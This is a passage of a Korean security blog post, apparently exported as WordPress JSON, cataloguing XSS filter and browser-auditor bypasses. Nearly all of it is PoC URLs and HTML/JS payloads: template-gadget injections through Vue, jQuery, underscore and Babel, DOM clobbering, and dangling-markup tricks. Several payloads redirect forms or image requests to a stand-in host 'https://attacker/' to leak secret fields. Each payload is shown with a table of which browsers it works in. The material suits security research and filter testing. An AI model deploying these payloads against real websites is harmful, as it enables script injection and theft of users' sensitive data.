\ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac \uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0 Vue.js \ud30c\uc77c\uc774 \uc874\uc7ac\ud558\uac70\ub098 CORS\uc5d0 \ub300\uc751\ud55c CDN\uc73c\ub85c\ubd80\ud130 Vue.js\ub97c \ub85c\ub4dc\ud558\ub294 \ud398\uc774\uc9c0\uac00 \uc874\uc7ac \ud398\uc774\uc9c0 \ud639\uc740 \uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0\uc11c \uc870\uc791\ub41c \ud0dc\uadf8\uac00 \ud15c\ud50c\ub9bf\uc744 \ud1b5\ud558\uc5ec \uc2e4\ud589\ub420 \uc218 \uc788\uc74c PoC: https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Clink%20rel=import%20href=\/bypass\/vue.html%3E%3Cdiv%20id=app%3E{{constructor.constructor(%27alert(1)%27)()}} &lt;link rel=import href=\/bypass\/vue.html&gt;&lt;div id=app&gt;{{constructor.constructor(&#8216;alert(1)&#8217;)()}} O X X X O X jQuery\uc758 \uc0ac\uc6a9 \uacf5\uaca9 \uac00\ub2a5 \uc870\uac74: \uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac \uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0 jQuery \ud30c\uc77c\uc774 \uc874\uc7ac\ud558\uac70\ub098 CORS\uc5d0 \ub300\uc751\ud55c CDN\uc73c\ub85c\ubd80\ud130 jQuery\ub97c \ub85c\ub4dc\ud558\ub294 \ud398\uc774\uc9c0\uac00 \uc874\uc7ac \ud398\uc774\uc9c0 \ud639\uc740 \uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0\uc11c \uc870\uc791\ub41c form\ud0dc\uadf8\uac00 jQuery\uc758 \ud568\uc218\ub97c \ud1b5\ud558\uc5ec \uc2e4\ud589\ub420 \uc218 \uc788\uc74c \ubcf4\ucda9: jQuery\uc758 \ud568\uc218\ub294after, before, prepend, append, html, replaceWith, wrap, wrapAll, insertBefore, insertAfter, prependTo, appendTo\ub4f1\uc774 \uc788\uc74c.ownerDocument\ub77c\ub294 name\uc18d\uc131\uc744 \uac00\uc9c4 form\uc744 \uc0ac\uc6a9\ud574\uc11c Node.ownerDocument\uc758 \ucc38\uc870\ub97c \uc18d\uc5ec\uc2a4\ud06c\ub9bd\ud2b8\uac00 \uc2e4\ud589\ub418\uc9c0 \uc54a\ub294 \ud658\uacbd\uc5d0\uc11c \uc2a4\ud06c\ub9bd\ud2b8\ub97c \uc2e4\ud589\ud558\uac8c \ud560 \uc218 \uc788\uc74c(\uc774\ub7ec\ud55c \uae30\ubc95\uc744 DOM Clobbering\ub77c\uace0 \ubd80\ub984)\ub610\ud55c, \uc2a4\ud06c\ub9bd\ud2b8\uc758 \uc2e4\ud589 \uc804\uc5d0 &lt;!-\u200b\u200b- \ub97c \uc81c\uac70\ud558\ub294 \uacfc\uc815\uacfc, Auditor\uc5d0\uc11c\ub294 \uc8fc\uc11d\uc744 \ucc28\ub2e8\ud558\uc9c0 \uc54a\ub294 \uacfc\uc815\uc774 \ud569\uccd0\uc838 \uc6b0\ud68c\uac00 \uac00\ub2a5 \ucc38\uace0URL: https:\/\/sirdarckcat.github.io\/csp\/jquery.html PoC: https:\/\/vulnerabledoma.in\/bypass\/text?type=5&amp;q=%3Cform%20class=child%3E%3Cinput%20name=ownerDocument%3E%3Cscript%3E%3C!&#8211;alert(1)%3C\/script%3E%3C\/form%3E &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;script src=&#8221;\/js\/jquery-3.2.1.min.js&#8221;&gt;&lt;\/script&gt; &lt;script&gt; $(document).ready(function(){ \/\/ code taken from http:\/\/api.jquery.com\/after\/ $( &#8220;.container&#8221; ).after( $( &#8220;.child&#8221; ) ); }); &lt;\/script&gt; &lt;\/head&gt; &lt;body&gt; &lt;!&#8211; XSS &#8211;&gt; &lt;form class=child&gt;&lt;input name=ownerDocument&gt;&lt;script&gt;&lt;!&#8211;alert(1)&lt;\/script&gt;&lt;\/form&gt; &lt;!&#8211; XSS &#8211;&gt; &lt;p class=&#8221;container&#8221;&gt;&lt;\/p&gt; &lt;\/body&gt; &lt;!&#8211; Inspired by @sirdarckcat CSP bypass trick: https:\/\/sirdarckcat.github.io\/csp\/jquery.html &#8211;&gt; &lt;\/html&gt; O O X X O X https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Clink%20rel=import%20href=\/bypass\/jquery.html%3E%3Cp%20class=container%3E%3C\/p%3E%3Cform%20class=child%3E%3Cinput%20name=ownerDocument%3E%3Cscript%3E%3C!-\u200b-alert(1)%3C\/script%3E%3C\/form%3E &lt;link rel=import href=\/bypass\/jquery.html&gt;&lt;p class=container&gt;&lt;\/p&gt;&lt;form class=child&gt;&lt;input name=ownerDocument&gt;&lt;script&gt;&lt;!&#8211;alert(1)&lt;\/script&gt;&lt;\/form&gt; O X X X O X underscore.js\uc758 \uc0ac\uc6a9 \uacf5\uaca9 \uac00\ub2a5 \uc870\uac74: \uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac \uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0 underscore.js \ud30c\uc77c\uc774 \uc874\uc7ac\ud558\uac70\ub098 CORS\uc5d0 \ub300\uc751\ud55c CDN\uc73c\ub85c\ubd80\ud130 underscore.js\ub97c \ub85c\ub4dc\ud558\ub294 \ud398\uc774\uc9c0\uac00 \uc874\uc7ac \ud398\uc774\uc9c0 \ud639\uc740 \uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0\uc11c \uc870\uc791\ub41c script\ud0dc\uadf8\uac00 \ud15c\ud50c\ub9bf\uc744 \ud1b5\ud558\uc5ec \uc2e4\ud589\ub420 \uc218 \uc788\uc74c PoC: https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Clink%20rel=import%20href=\/bypass\/underscore.html%3E%3Cscript%20id=template%3E\/\/%3C%alert`1`%%3E%3C\/script%3E &lt;link rel=import href=\/bypass\/underscore.html&gt;&lt;script id=template&gt;\/\/&lt;%alert`1`%&gt;&lt;\/script&gt; O X X X O X JSXTransformer\/babel-standalone\ub4f1\uc758 JSX \ubcc0\ud658 \uc2a4\ud06c\ub9bd\ud2b8 \uc0ac\uc6a9 \uacf5\uaca9 \uac00\ub2a5 \uc870\uac74: \uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac \uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0 JSXTransformer.js \ub4f1\uc758 JSX \ubcc0\ud658 \uc2a4\ud06c\ub9bd\ud2b8 \ud30c\uc77c\uc774 \uc874\uc7ac\ud558\uac70\ub098 CORS\uc5d0 \ub300\uc751\ud55c CDN\uc73c\ub85c\ubd80\ud130 \ud574\ub2f9 \ud30c\uc77c\uc744 \ub85c\ub4dc\ud558\ub294 \ud398\uc774\uc9c0\uac00 \uc874\uc7ac \ubcf4\ucda9: \ubcc0\ud658 \uc2a4\ud06c\ub9bd\ud2b8\uac00 SVG\uc758 \uc2a4\ud06c\ub9bd\ud2b8 \ube14\ub85d\uc744 HTML\uc758 \uc2a4\ud06c\ub9bd\ud2b8 \ube14\ub85d\uc73c\ub85c \ucef4\ud30c\uc77c\ud558\ub294 \uc810\uc744 \uc0ac\uc6a9\ud558\uc5ec \uc2e4\ud589\ud558\uc9c0 \uc54a\ub294 \uc8fc\uc11d \ubd80\ubd84\uc778 &lt;!-\u200b- -\u200b-&gt; \ubd80\ubd84\uc744 \uc2a4\ud06c\ub9bd\ud2b8\ub85c \uc778\uc2dd\ud568 PoC: https:\/\/vulnerabledoma.in\/bypass\/text?charset=utf-8&amp;type=1&amp;q=%3Clink%20rel=import%20href=\/bypass\/babel-standalone.html%3E%3Csvg%3E%3Cscript%20type=%22text\/jsx%22%3E\/\/%3C!&#8211;%0aalert(1)\/\/&#8211;%3E%3C\/svg%3E%3Cscript%3E0%3C\/script%3E &lt;link rel=import href=\/bypass\/babel-standalone.html&gt;&lt;svg&gt;&lt;script type=text\/jsx&gt;\/\/&lt;!&#8211; alert(1)\/\/&#8211;&gt;&lt;\/svg&gt;&lt;script&gt;0&lt;\/script&gt; O X X X O X document.write()\ub420 \ub54c \uc5b4\uc911\uac04\ud55c \ud0dc\uadf8\ub97c \uc0ac\uc6a9 \uacf5\uaca9 \uac00\ub2a5 \uc870\uac74: URL\uc744 document.write() \ud558\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac \uacf5\uaca9\uc5d0 \uc0ac\uc6a9\ub418\ub294 \ud0dc\uadf8\uac00 document.write() \ub420 \ub54c \ub4a4\uc5d0 html \ud0dc\uadf8\uac00 \uc874\uc7ac\ud568 (PoC\uc5d0\uc11c\ub294 &lt;\/body&gt;\ub97c \ud65c\uc6a9) \ucc38\uace0URL: https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=421786 PoC: https:\/\/vulnerabledoma.in\/bypass\/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)\/\/ &lt;body&gt; &lt;script&gt; hash=location.hash.slice(1); document.write(decodeURIComponent(hash)); &lt;\/script&gt; &lt;\/body&gt; O O O O O X Chrome, Firefox, Edge, IE\uc5d0\uc11c\ub294 &gt; \ub85c \ud0dc\uadf8\ub97c \ub2eb\uc544\ub3c4 \uc815\uc0c1\uc801\uc73c\ub85c XSS \ud544\ud130 \uc6b0\ud68c\uac00 \uac00\ub2a5\ud568 \uc624\uc9c1 Opera\uc5d0\uc11c\ub9cc \uc5b4\uc911\uac04\ud55c \ud0dc\uadf8\ub97c \uc0ac\uc6a9\ud574 XSS \ud544\ud130\ub97c \uc6b0\ud68c\ud574\uc57c \ud568 document.write() \ud568\uc218 \ub4a4\uc5d0 \ub2e4\ub978 \ud0dc\uadf8\uac00 \uc874\uc7ac\ud560 \uacbd\uc6b0\uc5d0 \uc5b4\uc911\uac04\ud55c \ud0dc\uadf8\uac00 \uc791\uc131\ub41c \ud6c4\uc5d0 \ub2e4\ub978 \ud0dc\uadf8\uc758 &gt; \uac00 \uc5b4\uc911\uac04\ud55c \ud0dc\uadf8\ub97c \ub2eb\ub294 \uc5ed\ud560\uc744 \ud574\uc90c. PoC\uc758 \uacbd\uc6b0\uc5d0 document.body.innerHTML \uac12\uc740&lt;img src=&#8221;x&#8221; onerror=&#8221;alert(1)\/\/&#8221; &lt;=&#8221;&#8221; body=&#8221;&#8221;&gt; \uac00 \ub428 \uc5b4\uc911\uac04\ud55c form\ud0dc\uadf8\uc758 \uc0ac\uc6a9(\ubbfc\uac10 \uc815\ubcf4 \ucde8\ub4dd \uac00\ub2a5) \uacf5\uaca9 \uac00\ub2a5 \uc870\uac74: \uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac \uc0c8\ub85c form \ud0dc\uadf8\ub97c \uc368 \ubbfc\uac10 \uc815\ubcf4\ub97c \ud3ec\ud568\ud55c \uae30\uc874\uc758 form\ub0b4\uc6a9\uc758 action\uac12\uc744 \ubc14\uafd4\uce58\uae30 \ud560 \uc218 \uc788\uc74c \ucc38\uace0URL: https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=719092 PoC: (form \ub0b4\ubd80\uc5d0 \uc874\uc7ac) https:\/\/vulnerabledoma.in\/bypass\/form?q=%22%3E%3C\/form%3E%3Cform%20action=https:\/\/attacker\/ &lt;form action=&#8221;form&#8221;&gt; &lt;input type=&#8221;hidden&#8221; name=&#8221;q&#8221; value=&#8221;&#8221;&gt;&lt;\/form&gt;&lt;form action=https:\/\/attacker\/&#8221;&gt; &lt;input type=&#8221;hidden&#8221; name=&#8221;secret&#8221; value=&#8221;a09d3ef0&#8243;&gt; &lt;input type=&#8221;submit&#8221;&gt; &lt;\/form&gt; X O O O X O (form \uc678\ubd80\uc5d0 \uc874\uc7ac) https:\/\/vulnerabledoma.in\/bypass\/form2?q=%3Cbutton%20form=f%3ECLICK%3Cform%20id=f%20action=https:\/\/attacker\/ &lt;div&gt;&lt;button form=f&gt;CLICK&lt;form id=f action=https:\/\/attacker\/&lt;\/div&gt; &lt;form action=&#8221;form2&#8243;&gt; &lt;input type=&#8221;hidden&#8221; name=&#8221;secret&#8221; value=&#8221;a09d3ef0&#8243;&gt; &lt;\/form&gt; X O O X X O IE\/Edge\uc758 XSS \ud544\ud130 \ucc28\ub2e8 \ub300\uc0c1\uc774 \uc544\ub2cc \uac83 \ubb38\uc790\uc5f4 \ub9ac\ud130\ub7f4\uc5d0\uc11c \uc77c\uc5b4\ub098\ub294 XSS \ubcf4\ucda9: \uc774\uc804\uc5d0\ub294 \ubb38\uc790\uc5f4 \ub9ac\ud130\ub7f4 \ucc28\ub2e8\uc870\uac74\uc774 \uc874\uc7ac\ud588\uc74c. \ud604\uc7ac\ub3c4 \ucc28\ub2e8 \uc870\uac74\uc774 \ubd80\ubd84\uc801\uc73c\ub85c \ub0a8\uc544\uc788\uc9c0\ub9cc,\uc774\uc804\uc5d0\ub294 \ucc28\ub2e8\ub418\uc5c8\ub358 location\uc5d0 \ub300\uc785\ud558\ub294 \uacf5\uaca9 \ubc29\ubc95\uc774 \ud5c8\uac00\ub418\uc5c8\uae30\uc5d0 \ud544\ud130\uac00 \uc5c6\ub294 \uac83\uacfc \ub9c8\ucc2c\uac00\uc9c0\uc784 https:\/\/vulnerabledoma.in\/bypass\/str_literal?q=%22%3Blocation=&#8217;javascript\\x3Aalert\\x281\\x29&#8217;\/\/ &lt;script&gt;var q=&#8221;&#8221;;location=&#8217;javascript\\x3Aalert\\x281\\x29&#8217;\/\/&#8221;&lt;\/script&gt; O O O O O O \uc644\uc804\ud55c DOM based XSS https:\/\/vulnerabledoma.in\/bypass\/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)%3E &lt;script&gt; hash=location.hash.slice(1); document.write(decodeURIComponent(hash)); &lt;\/script&gt; X O O O X X https:\/\/vulnerabledoma.in\/bypass\/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)%3E &lt;body&gt; &lt;script&gt; hash=location.hash.slice(1); document.body.innerHTML=decodeURIComponent(hash); &lt;\/script&gt; &lt;\/body&gt; O O O O O O https:\/\/vulnerabledoma.in\/bypass\/dom_redirect#javascript:alert(1) &lt;script&gt; location.href=decodeURIComponent(location.hash.slice(1)); &lt;\/script&gt; O O O O O O 2\uac1c \uc774\uc0c1\uc758 \uc778\uc81d\uc158 \ud3ec\uc778\ud2b8\uac00 \uc788\ub294 \uacbd\uc6b0 https:\/\/vulnerabledoma.in\/bypass\/text?type=2&amp;q=%22src=data:,alert%25281%2529%3E%3C\/script%3E%3Cscript%20x=%22 &lt;div&gt;&#8221;src=data:,alert%281%29&gt;&lt;\/script&gt;&lt;script x=&#8221;&lt;\/div&gt; &lt;div&gt;&#8221;src=data:,alert%281%29&gt;&lt;\/script&gt;&lt;script x=&#8221;&lt;\/div&gt; X O O O X X \ubb38\uc790\uc5f4 \uc870\uc791\uc774 \uc788\ub294 \uacbd\uc6b0 \uc77c\ubd80 \ubb38\uc790\uc5f4\uc774 \uc0ad\uc81c\ub418\uac70\ub098 \uce58\ud658\ub420 \ub54c \ud574\ub2f9 \ubb38\uc790\uc5f4\uc744 \ud398\uc774\ub85c\ub4dc \uc0ac\uc774\uc5d0 \ub123\uc5b4 \ucc28\ub2e8\uc744 \uc6b0\ud68c\ud560 \uc218 \uc788\uc74c \uc0ad\uc81c\ub418\ub294 \uacbd\uc6b0 https:\/\/vulnerabledoma.in\/bypass\/text?type=6&amp;q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E &lt;svg o&lt;script&gt;nload=alert(1)&gt; \u2193 &lt;svg onload=alert(1)&gt; O O O O O O \uce58\ud658\ub418\ub294 \uacbd\uc6b0 XSS \ud544\ud130\uac00 \uc815\uaddc\ud45c\ud604\uc2dd\uc5d0\uc11c .\uc774 \uc758\ubbf8\ud558\ub294 \uae38\uc774 \uc774\uc0c1\uc73c\ub85c \uce58\ud658\ud558\ub294 \uacbd\uc6b0\uc5d0\ub294 \uc6b0\ud68c\ud560 \uc218 \uc788\uc74c \ub2e4\uc74c\uc758 \uacbd\uc6b0\uc5d0\ub294&lt;sc{r}ipt.*?&gt;\ub77c\ub294 \ucc28\ub2e8 \uc870\uac74\uc5d0 \ub9e4\uce58\ub418\uc9c0 \uc54a\ub3c4\ub85d &amp;\uac00 \uae38\uc774 \uc774\uc0c1\uc73c\ub85c \uce58\ud658\ub418\ub294 \ub3d9\uc791\uc744 \uc0ac\uc6a9\ud568\/\ub294 0-3\uae00\uc790, &amp;\ub294 0-5\uae00\uc790\uc758 \uc640\uc77c\ub4dc\uce74\ub4dc\uc774\uae30 \ub54c\ubb38\uc5d0, \ucc28\ub2e8\ud560 \uc218 \uc788\ub294 \ucd5c\ub300 \uae38\uc774\ub294 8\uae00\uc790\uc784\/&amp;\uac00 \uce58\ud658 \ud6c4 \ucd9c\ub825\ub418\ub294 \ubb38\uc790\uc5f4\uc740 10\uae00\uc790\uc774\uace0, \ucc28\ub2e8\ud560 \uc218 \uc788\ub294 \ucd5c\ub300 \uae38\uc774\uc778 8\uae00\uc790\ub97c \ub118\uc73c\ubbc0\ub85c \uc6b0\ud68c\uac00 \uac00\ub2a5\ud568 PoC: https:\/\/vulnerabledoma.in\/bypass\/text?type=10&amp;q=%3Cscript\/%26%3Ealert(1)%3C\/script%3E &lt;script\/&amp;&gt;alert(1)&lt;\/script&gt; \u2193 &lt;script\/&amp;amp;amp;&gt;alert(1)&lt;\/script&gt; X O O O X O \ub2e4\uc74c\uc740 \uc2a4\ud06c\ub9bd\ud2b8\uc758 \uc2e4\ud589\uc740 \ubd88\uac00\ub2a5\ud558\uc9c0\ub9cc \uc545\uc6a9\uc758 \uac00\ub2a5\uc131\uc774 \uc874\uc7ac\ud558\ub294 \uae30\ubc95\uc784 \uc678\ubd80\uc5d0 \uc694\uccad\uc744 \ubcf4\ub0bc \uc218 \uc788\ub294 \ud0dc\uadf8 \uc774\ubbf8\uc9c0 \ud0dc\uadf8 \ub4f1\uc758 src \uc18d\uc131\uc758 \ud55c \ucabd\uc744 \ub2eb\uc9c0 \uc54a\uace0 \uc0ac\uc6a9\ud558\uc5ec \ubbfc\uac10 \uc815\ubcf4\ub97c \ub9ac\ud018\uc2a4\ud2b8\uc5d0 \ud3ec\ud568\uc2dc\ud0ac \uc218 \uc788\uc74c https:\/\/vulnerabledoma.in\/bypass\/text?type=8&amp;q=%3Cimg%20src=%22https:\/\/attacker\/?data= &lt;p&gt;&lt;img src=&#8221;https:\/\/attacker\/?data=&lt;\/p&gt; &lt;p&gt;This is a&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[4],"tags":[],"_links":{"self":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/146"}],"collection":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/comments?post=146"}],"version-history":[{"count":169,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/146\/revisions"}],"predecessor-version":[{"id":330,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/146\/revisions\/330"}],"wp:attachment":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/media?parent=146"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/categories?post=146"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/tags?post=146"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}